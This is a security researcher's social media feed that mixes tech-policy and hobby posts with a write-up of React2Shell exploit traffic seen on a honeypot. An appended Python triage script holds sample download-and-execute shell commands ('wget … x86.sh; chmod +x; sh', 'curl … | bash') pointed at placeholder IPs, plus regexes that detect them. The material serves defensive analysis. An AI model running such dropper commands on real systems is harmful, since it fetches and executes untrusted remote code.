Andrew 🌻 Brandt

Words published here do not necessarily reflect views of my employer or any other organization I am affiliated with.

Research and analysis about malware, network forensics, and the intersection of crime with anything that electrons or photons flow through.

Board member of World Cyber Health, the parent organization behind Malware Village and the NO-HAVOC project.

Docent of obsolete technology at @mediaarchaeologylab

Executive director, Elect More Hackers: electmorehackers.com

"By reading this, you agree, on behalf of your employer, to release me from all obligations and waivers arising from any and all NON-NEGOTIATED agreements, licenses, terms-of-service, shrinkwrap, clickwrap, browsewrap, confidentiality, non-disclosure, non-compete and acceptable use policies ("BOGUS AGREEMENTS") that I have entered into with your employer, its partners, licensors, agents and assigns, in perpetuity, without prejudice to my ongoing rights and privileges." -- Cory Doctorow

Backup tooter
@threatresearch.bsky.social
Threat level
mostly harmless
Andrew 🌻 Brandt boosted:
2026-01-29

A new Android malware campaign is using the Hugging Face platform as a repository for thousands of variations of an APK payload that collects credentials for popular financial and payment services.

bleepingcomputer.com/news/secu

Andrew 🌻 Brandt boosted:
2026-01-29
Andrew 🌻 Brandt boosted:
2026-01-29
A white dishtowel with an embroidered panel. It features a row of coral flowers and some blue bunting. The message reads: "AI SHOULD DO DISHES."
Andrew 🌻 Brandt threatresearch@infosec.exchange
2026-01-24

@davidgerard Maybe he could just become a RAM vendor to every other industry, since he apparently felt the need to buy every single goddamn wafer in existence in advance, before it was even produced.

Andrew 🌻 Brandt threatresearch@infosec.exchange
2026-01-22

@harrymccracken Second nomination for Steve Wozniak, but also for whichever exec at Commodore convinced engineering to let their dog's footprint be on the interior of the upper case mold for the Amiga, with all the other execs' signatures. Absolute legend.

Andrew 🌻 Brandt boosted:
2026-01-22

Launching their new social network, W, a group in the EU posted a map of where other social networks are hosted. It showed nothing in Europe.

But their map is wrong.

Here's what Mastodon actually looks like, and what the Fediverse as a whole actually looks like.

arewedecentralizedyet.online/m

A screenshot of a map showing that Mastodon instances are located around the world.
A screenshot of a map showing that many kinds of Fediverse instances are located around the world.
Andrew 🌻 Brandt boosted:

@thetnholler.bsky.social

I can't say it better than this:

"I have given this offer more consideration than it is due already. Now, fuck off. Then keep fucking off. Fuck off until you come up to a gate with a sign saying ‘You Can’t Fuck Off Past Here.’ Climb over the gate, dream the impossible dream, and keep fucking off forever."

Cory Doctorow (@pluralistic), Attack Surface (Little Brother, #3)

Andrew 🌻 Brandt boosted:
2026-01-19

#Mozilla wants to know what you want from them and, in particular, #Firefox.

Let.

Them.

Know.

mozillafoundation.tfaforms.net

Andrew 🌻 Brandt threatresearch@infosec.exchange
2026-01-12

@north
Counterpoint:

ActivityPub binhex over morse code, transmitted on HF frequencies during solar storms for increased range

Andrew 🌻 Brandt threatresearch@infosec.exchange
2026-01-12

@PhineasX Legendary!

Andrew 🌻 Brandt threatresearch@infosec.exchange
2026-01-12

@atomicpoet Dang, and here I thought it was going to be a beer brewing sim!

Andrew 🌻 Brandt boosted:
PACES Vancouver noschoolai
2026-01-12

Vancouver School Board are planning to deploy Microsoft Copilot in classrooms.

We are collecting signatures to show VSB that we are concerned about the effect on our children, and do not consent.

If you are concerned about AI being used in classrooms, please sign and share this petition.

actionnetwork.org/petitions/vo

Andrew 🌻 Brandt threatresearch@infosec.exchange
2026-01-12

I just signed a petition put out by @noschoolai, run by parents whose children attend the Vancouver school district in Vancouver, BC, Canada.

Their school board, the VSB, has decided to deploy the Microsoft Copilot generative AI tool to the district. These parents oppose the use of Gen AI chatbots in schools, and have organized a petition drive to signal to the school board that the wider community does not agree with this deployment.

Here is what I wrote in my petition comment:

While neither a resident of the region nor a parent of a student in this school, I am a tech policy expert and advisor on the use of generative AI in K-12 education.

I strongly discourage the VSB from deploying this technology until and unless they understand the educational purpose of the deployment, and have already passed and enacted appropriate districtwide policies governing the boundaries of how, when, and who are allowed to use it, and for what purpose, sought feedback from the wider community, and fully understand and have explained to the public what are the privacy, data security, and abuse/exploitation risks you are willing to tolerate in order to subject students and staff in the district to this technology.

If you cannot explain the fundamental educational purpose of this project, the limits you place on its use, and a risk model for what happens when use falls outside of these parameters, under no circumstances do you have any business deploying or using generative AI in any schools.

noai.school/vsb-petition/

#EdTech #SchoolBoard #TechPolicy

Andrew 🌻 Brandt boosted:
2026-01-12

I'm having trouble with the UK #PostOffice customs form entry today. Whatever HS code I try to type in by number, it only ever offers this 8211 - which appears to be for table knives. I wanted circuit boards.

Type a description of what you're sending

Customs code (HS tariff no.)

[ box where I entered 8537.10 ]

Please select:

Tools, implements, cutlery, spoons and forks, of base metal; parts thereof of base metal: Knives with cutting blades, serrated or not (including pruning knives), other than knives of heading 82.08, and blades therefor.: Other: Table knives having fixed blades(8211.91.00)
Andrew 🌻 Brandt boosted:
2026-01-12

Well, here's a new accursed UI pattern. When you try to book a flight on Chase rewards and key in the exact code for the airport you want to go to, it suggests a bunch of non-matching airports, and puts the exact match like 10 options down.

A drop-down menu from the Chase website. I have keyed in "LHR" and the menu has dropped down a menu with the options "LXA," "LHW" and "LHE."
Andrew 🌻 Brandt threatresearch@infosec.exchange
2026-01-12

@danielkennedy74 Are they "securi-splainers?"

Andrew 🌻 Brandt threatresearch@infosec.exchange
2026-01-12

@thedarktangent @adamshostack came here to say exactly this. Well played, Adam! 😂

Andrew 🌻 Brandt boosted:
2026-01-12

The UK government is to enforce a law this week which will make it a criminal offence to create non-consensual intimate images and make a new law to make tools to create non-consensual intimate images illegal bbc.co.uk/news/articles/cq845g

Andrew 🌻 Brandt threatresearch@infosec.exchange
2026-01-12

I had a chance last week to chat with Benjamin Read of #Wiz. Last month, Read and other members of his team published a deep dive into the #React2Shell (CVE-2025-55182) vulnerability, and I was curious to see what has been hitting my honeypot, so I took a closer look.

This is doing some weird stuff, friends.

As is normally the case with exploits targeting internet-facing devices, once the exploit becomes known, it ends up in the automated scanners used by threat actors and security researchers. What I've seen over the past week is a combination of both.

In just a few hours of operation, I identified a small number of source IP addresses exploiting React2Shell by pointing the vulnerable system at URLs hosting BASH scripts. These scripts are really familiar to anyone who routinely looks at honeypot data - they contain a series of commands that pull down and execute malicious payloads.

And as I've seen in the past, some of these payloads use racially inflammatory language in their malware. It's weird and gross, but unfortunately, really common.

But while most of these payloads were "the usual suspects" - remote shells, cryptocurrency miners - there was one payload that stuck out.

It's an exploit file, based on this proof-of-concept [github.com/iotwar/FIVEM-POC/bl] designed to DDoS a modded server running "FiveM," a popular version of the game Grand Theft Auto V.

Let that one sink in: among the earliest adopters of a brand new exploit are...people trying to mess with other people's online game servers.

I've long said that exploits like these are the canaries in the datacenter coal mine. After all, if an attacker can force your server to run a cryptominer (or a game DDoS tool), they can force it to run far more malicious code.

I guess someone, or a group of someones, just wants to ruin everyone's good time, no matter how or what form that takes. And they'll do it in the most offensive way possible.

Anyway, patch your servers, please, if only to stick it to these people who want to be the reason we can't have nice things.

#PoC #exploit #CVE_2025_55182 #DDoS #FiveM #REACT #Bash #cryptominer #malware

User-Agents employed both by researchers and threat actors attempting to exploit React2Shell on a honeypot
Some of the malware contains Bash script commands and filenames with racially offensive slurs. These are not nice people.
What a sample React2Shell exploit command looks like - a lot like Mirai and other automated worms
In just a few hours, these four IP addresses tried to infect my honeypot dozens of times.
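A defender-side triage script for the kind of honeypot traffic the post describes, added here as an example; it is not code from the post or its author. It takes constructed honeypot records (source IP plus the command string delivered through the exploit), flags the download-and-execute pattern the post mentions (curl/wget of a remote script that is then piped to or run by a shell), and aggregates per-source hit counts and payload hosts for blocklisting and reporting. The record shape, the regular expressions, and every IP, host and command below are assumptions and placeholders, not the React2Shell request format (which the post does not reproduce) and not the author's observed data.

```python
"""Triage of honeypot hits that deliver download-and-execute shell droppers.

Added example, not from the post. The record format, regexes, IPs, hosts and
commands are constructed placeholders, not the author's honeypot data.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed honeypot records: (source IP, command string delivered through the exploit).
# Addresses are from the RFC 5737 documentation ranges.
SAMPLE_HITS = [
    ("198.51.100.7", "cd /tmp; wget http://203.0.113.10/x86.sh; chmod +x x86.sh; sh x86.sh"),
    ("198.51.100.7", "cd /tmp; curl -s http://203.0.113.10/x86.sh | bash"),
    ("198.51.100.23", "curl -fsSL http://203.0.113.44/cron.sh | sh"),
    ("192.0.2.5", "uname -a"),  # fingerprinting only: no remote fetch, so not a dropper
    ("198.51.100.7", "wget -q -O- http://203.0.113.10/arm.sh | sh"),
]

# A curl/wget invocation followed (within the same shell command) by an http(s) URL.
FETCH_RE = re.compile(r"\b(?:curl|wget)\b[^;|&]*?(https?://[^\s;|&'\"]+)")
# Evidence that fetched content is executed: piped into a shell, marked executable,
# or run as a script argument to sh/bash.
EXEC_RE = re.compile(r"\|\s*(?:ba)?sh\b|\bchmod\s+\+x\b|\b(?:ba)?sh\s+\S+\.sh\b")


def classify(command):
    """Return ('dropper', urls) if the command fetches and runs remote content,
    otherwise ('other', [])."""
    urls = FETCH_RE.findall(command)
    if urls and EXEC_RE.search(command):
        return "dropper", urls
    return "other", []


def triage(hits):
    """Aggregate per source IP: total hits, dropper hits, and the hosts serving payloads."""
    summary = defaultdict(lambda: {"hits": 0, "droppers": 0, "payload_hosts": set()})
    for src, cmd in hits:
        entry = summary[src]
        entry["hits"] += 1
        kind, urls = classify(cmd)
        if kind == "dropper":
            entry["droppers"] += 1
            entry["payload_hosts"].update(urlsplit(u).hostname for u in urls)
    return dict(summary)


def payload_hosts(hits):
    """Distinct hosts serving droppers across all sources: the list to block and report."""
    hosts = set()
    for entry in triage(hits).values():
        hosts |= entry["payload_hosts"]
    return sorted(hosts)


if __name__ == "__main__":
    for src, entry in sorted(triage(SAMPLE_HITS).items()):
        print(f"{src}: {entry['hits']} hits, {entry['droppers']} droppers, "
              f"hosts={sorted(entry['payload_hosts'])}")
    print("payload hosts:", payload_hosts(SAMPLE_HITS))
```

Run it as-is to see the per-source summary; to use it on real honeypot output, replace SAMPLE_HITS with (source IP, command) pairs parsed from your own logs. The two-part test (a fetch and an execute step in the same command) keeps plain reconnaissance like `uname -a` out of the dropper bucket, and the payload host list, rather than the full URL, is what usually survives long enough to be worth blocking, since the script names rotate while the hosting box often does not.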
Andrew 🌻 Brandt boosted:
2026-01-12

OFCOM have opened a formal investigation into X.

They may fine X 10% of its global revenue, require all advertisers to withdraw as an X client, and require UK internet providers to block X. ofcom.org.uk/online-safety/ill
